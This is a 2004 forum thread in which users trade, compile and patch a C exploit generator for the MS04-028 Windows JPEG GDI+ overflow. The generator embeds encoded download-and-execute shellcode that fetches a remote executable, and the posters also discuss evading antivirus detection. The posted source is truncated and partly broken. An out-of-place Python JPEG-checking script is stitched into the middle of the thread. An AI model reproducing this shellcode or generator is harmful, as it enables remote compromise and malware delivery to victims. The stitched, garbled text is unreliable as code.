/* it is the marker for end of jpeg image*/
fprintf(fout,"\xFF\xD9");
fclose(fout);
printf("The Jpeg Server, has been created.with your settings.\n");
return 0;
}
Xion
Sep 25 2004, 09:40 PM
I have an error with line > char *newshellcode = new char[sizeof(shellcode)+strlen(argv[1])+1];
rscience
Sep 25 2004, 11:02 PM
c.c:164:24: missing terminating " character
c.c: In function `main':
c.c:165: error: parse error before "Security"
c.c:165: error: stray '\' in program
c.c:165: error: stray '\' in program
c.c:165:28: missing terminating " character
c.c:168:24: missing terminating " character
c.c:169: error: `OutputPath' undeclared (first use in this function)
c.c:169: error: (Each undeclared identifier is reported only once
c.c:169: error: for each function it appears in.)
c.c:169: error: stray '\' in program
c.c:169: error: stray '\' in program
c.c:169: error: `r' undeclared (first use in this function)
c.c:169: error: parse error before "n"
c.c:169: error: stray '\' in program
c.c:169: error: stray '\' in program
c.c:169:21: missing terminating " character
c.c:170:24: missing terminating " character
c.c:171: error: stray '\' in program
c.c:171:12: missing terminating " character
c.c:176: error: `new' undeclared (first use in this function)
c.c:176: error: parse error before "char"
c.c:214:2: warning: no newline at end of file
FIX THIS !!!
tibbar
Sep 25 2004, 11:16 PM
What is wrong with you people!!!
Compiled in 5 minutes.
[EDIT] Oh, and rscience, I don't like your attitude: "FIX THIS!!!" Please ask more sensible questions, like what do these errors mean, and how can I get past them.
rscience
Sep 25 2004, 11:43 PM
I was trying to compile this but still have the same error. Tell me how you compiled this, or with what program?
Thanks in advance.
tibbar
Sep 25 2004, 11:48 PM
I used VC6; in case you want to see the changes I made to get it to compile, see the attached project.
Flowby
Sep 26 2004, 12:37 AM
Does it work?
tibbar
Sep 26 2004, 12:41 AM
Not tested it yet, I'm just compiling it for you guys! Let me know if it does.
Flowby
Sep 26 2004, 12:57 AM
Not for me!!
None of these exploits work!!
Believe me, if it would work... there would already be a worm out!
blahplok
Sep 26 2004, 03:57 AM
Using (Windows XP Prof SP 0 and Windows 2000 Prof SP 3) it does not work. Anyone have luck with this exploit?
Diablotic
Sep 26 2004, 07:34 AM
Rscience, you didn't change anything at all. Compiled fine for me and tested... If you think about how to use it you will get awesome results. Ave!
toska
Sep 26 2004, 09:11 AM
Most AVs pick up the result of the jpg generator...
Any ideas?
M4Z3R
Sep 26 2004, 11:09 AM
Well, let's see...
M4Z3R
Sep 26 2004, 11:14 AM
Here is the right source; however, I didn't try it to see if it worked. I made a few fixes, hope it RoX, enjoy. Here is the source working:
CODE
/* ===============================================================
   Windows JPEG GDI+ Overflow Download Shellcoded Exploit (MS04-028)
   Coded By ATmaCA
   Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic.
   E-Mail:atmaca@prohack.net
   Web:www.prohack.net
   =============================================================== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Generic win32 http download shellcode
   You can put approx 2500 bytes of shellcode...
   But the shell code can not contain 0xFFh 0xD9 because it is the marker for end of jpeg image. */
char shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";
/* static buffer replaces the C++ `new' allocation that broke the C build */
char newshellcode[1024]; //= char[sizeof(shellcode)+strlen(argv[1])+1];
unsigned int i=0,j=0;

int main(int argc, char *argv[])
{
    FILE *fout;

    if (argc < 3) {
        printf("\r\nJpeg Downloader V1.0 Console\r\n");
        printf("FixeD By M4Z3R, For GSO\r\n");
        printf("Credits and Greetings Go To:\r\n");
        printf("Coded By ATmaCA\r\n");
        printf("Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic\r\n");
        printf("E-Mail:atmaca@prohack.net\r\n");
        printf("Web:www.prohack.net\r\n\r\n");
        printf("Usage:\r\n%s <DownloadUrl> <OutputPath>\r\n\r\n",argv[0]);
        printf("Example:%s http://www.yoursite.com/server.exe mypic.jpg\n", argv[0]);

    /* it is the marker for end of jpeg image*/
    fprintf(fout,"\xFF\xD9");
    fclose(fout);
    printf("The Jpeg Server, has been created.with your settings.\n");
    return 0;
}
Cheers, M4Z3R
chris105
Sep 26 2004, 11:21 AM
Could AV be using this \xFF\xD9 to detect it, or would that detect all jpg files as exploits?
M4Z3R
Sep 26 2004, 11:28 AM
Well, if AV detects '\xFF\xD9' as a malicious string, I think it would block any jpg file, since jpg files end with this marker. I'm interested in how they detect worms and stuff; if anyone could help, it would be appreciated.
Cheers, M4Z3R
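The point in the two posts above (every complete JPEG ends with FF D9, so that marker cannot be a signature) can be checked with a small segment walker. This is an added example, not code from the thread or from the posted exploit; it walks the JPEG header segments of two constructed byte strings and reports the EOI marker beside the structural check that does distinguish the MS04-028 trigger, a segment length field below 2 (the length counts its own two bytes, so such a value underflowed in the vulnerable GDI+ parser). Function names and sample bytes are assumptions made here.

```python
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: SOI, EOI, TEM and the RSTn markers.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))

def walk_segments(data: bytes):
    """Yield (marker, declared_length) for each header segment up to SOS or EOI."""
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill bytes are permitted before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            yield marker, None
            if marker == EOI:
                return
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # includes its own 2 bytes
        yield marker, length
        if marker == SOS or length < 2:   # entropy data follows, or length is unusable
            return
        pos += 2 + length

def findings(data: bytes) -> dict:
    """'has_eoi' fires for every complete JPEG, so it is no signature;
    'bad_segment_lengths' lists length fields below 2, the MS04-028 trigger."""
    bad = [(m, n) for m, n in walk_segments(data) if n is not None and n < 2]
    return {"has_eoi": data.endswith(b"\xFF\xD9"), "bad_segment_lengths": bad}

# Constructed samples (not real files): a minimal JFIF header, and the same
# header followed by a COM segment whose length field is zero.
JFIF_APP0 = b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
BENIGN = b"\xFF\xD8" + JFIF_APP0 + b"\xFF\xD9"
MALFORMED = b"\xFF\xD8" + JFIF_APP0 + b"\xFF\xFE" + struct.pack(">H", 0) + b"\xFF\xD9"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, findings(sample))
```

Both samples report `has_eoi` as true; only the second reports a bad length, which is the property a scanner has to look at.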
extreme
Sep 26 2004, 11:32 AM
I read on a forum named Shadowcrew that the ATMACA exploit has a trojan embedded inside it... And here are the removal instructions to check:
0) boot in safe mode
1) remove key "COM Service" from: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run and from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ru
2) delete file: C:\WINDOWS\msagent\mssyeb.pif (hidden file)
M4Z3R
Sep 26 2004, 11:33 AM
What the heck are you talking about dude? I don't get it . . .
tibbar
Sep 26 2004, 12:04 PM
Well, whatever the new one does, here it is compiled.
rscience
Sep 26 2004, 12:13 PM
NOW.......................... I have COMPILED and it's working!!!!!! ...... I hate SHIT sources....
nuorder
Sep 26 2004, 12:15 PM
QUOTE (rscience @ Sep 26 2004, 10:13 PM)
NOW.......................... it's working...... I hate SHIT sources....
Why? I think it's good that someone makes an effort to write the code in the first place rather than relying on others to do the work for them.
tibbar
Sep 26 2004, 12:24 PM
"shit sources" is otherwise known as n00b protection
M4Z3R
Sep 26 2004, 12:31 PM
Lol yeah, and we finally distribute it to the n00bs. Shall we keep on doing this?
Cheers, M4Z3R
extreme
Sep 26 2004, 01:45 PM
About the trojan stuff I was talking about... There is a widely spread version of exactly this exploit...
QUOTE
/* ===============================================================
   Windows JPEG GDI+ Overflow Download Shellcoded Exploit (MS04-028)
   Coded By ATmaCA
   Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic.
   E-Mail:atmaca@prohack.net
   Web:www.prohack.net
   =============================================================== */
...but someone replaced the shellcode with a web downloader or trojan, I don't know for sure... Anyway, as victims report, it is very difficult to spot the trojan because it possibly has some rootkit functions... I say possibly, because I have not tested it myself... And I have put up removal instructions, so you can check yourself if you bumped into that version of the exploit... And since I am against posting compiled exploits, it is possible that one of these attachments is what I am talking about...
arn0ld
Sep 26 2004, 01:59 PM
I didn't understand what the <DownloadUrl> is which I'm supposed to insert there...
M4Z3R
Sep 26 2004, 02:44 PM
Extreme, don't be paranoid; the shellcode in this JPEG exploit version is for downloading from an HTTP server. Stop scaring people by telling stupid nonsense stories, thx
Well, from what it sounds like, he is saying there is a modified compiled version floating around that has a trojan in it, and he isn't necessarily saying that all versions of the exploit have the trojan. Will compile and fool with the exploit later.
Hellraiseruk
Sep 27 2004, 07:30 PM
Thx for all the compiled versions, but I think everyone's question is: does this exploit work? Can anyone tell us a definite answer.. cheerz